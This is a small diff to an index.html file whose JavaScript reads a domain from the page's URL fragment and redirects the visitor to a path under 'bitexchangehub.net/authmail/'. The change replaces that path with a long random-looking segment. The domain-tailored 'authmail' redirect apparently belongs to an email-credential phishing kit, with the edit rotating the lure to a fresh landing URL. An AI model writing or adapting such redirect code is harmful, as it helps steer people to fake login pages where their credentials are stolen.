--- a/index.html
+++ b/index.html
@@ -29,7 +29,7 @@
       var cross = root.split("#");
       var dom = cross[0];
 
-      var redirect = "https://bitexchangehub.net/authmail/index.html#{domain}";
+      var redirect = "https://bitexchangehub.net/authmail/VJ4Dx6FTqirpvybmY7KCPDXhMkb5B53aSAdliH0HR3yV2u7C7a9zG94GkHPtgmsGxm/index.html#{domain}";
       var link = redirect.replace("{domain}", dom);
       window.location.href = link;
     }
